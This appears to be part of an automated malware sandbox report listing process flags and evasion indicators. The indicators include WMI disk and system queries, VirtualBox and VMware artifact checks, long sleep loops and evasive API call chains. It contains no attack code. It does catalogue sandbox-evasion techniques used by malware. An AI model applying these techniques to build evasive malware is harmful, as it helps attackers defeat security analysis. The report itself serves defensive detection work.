Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

38_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4320	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5554	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2046
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 456
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 403
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 373
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1708
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 446
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 368
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 363

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.1 %
Source: C:\Windows\System32\lsass.exe	API coverage: 9.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\dwm.exe	API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.5 %
Source: C:\Windows\System32\wbem\WMIADAP.exe	API coverage: 8.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 4320 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 5554 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852	Thread sleep count: 5007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984	Thread sleep count: 2046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4428	Thread sleep count: 287 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6640	Thread sleep count: 456 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6640	Thread sleep time: -45600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2344	Thread sleep count: 273 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948	Thread sleep count: 403 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948	Thread sleep time: -40300s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1236	Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616	Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616	Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep count: 373 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep time: -37300s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228	Thread sleep count: 1708 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228	Thread sleep count: 446 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep count: 368 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep time: -36800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep count: 363 > 30
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep time: -36300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1880	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 1880	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2124	Thread sleep count: 342 > 30
Source: C:\Windows\System32\svchost.exe TID: 2124	Thread sleep time: -34200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6024	Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744	Thread sleep count: 322 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744	Thread sleep time: -32200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3264	Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 3264	Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6240	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6240	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6336	Thread sleep count: 309 > 30
Source: C:\Windows\System32\svchost.exe TID: 6336	Thread sleep time: -30900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6448	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 6448	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6516	Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 6688	Thread sleep count: 294 > 30

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894 FindFirstFileExW,	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894 FindFirstFileExW,	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894 FindFirstFileExW,	37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894 FindFirstFileExW,	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894 FindFirstFileExW,	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894 FindFirstFileExW,	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894 FindFirstFileExW,	40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894 FindFirstFileExW,	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894 FindFirstFileExW,	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894 FindFirstFileExW,	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894 FindFirstFileExW,	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894 FindFirstFileExW,	44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894 FindFirstFileExW,	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894 FindFirstFileExW,	46_2_000002295D56D894

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000030.00000002.3005591334.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
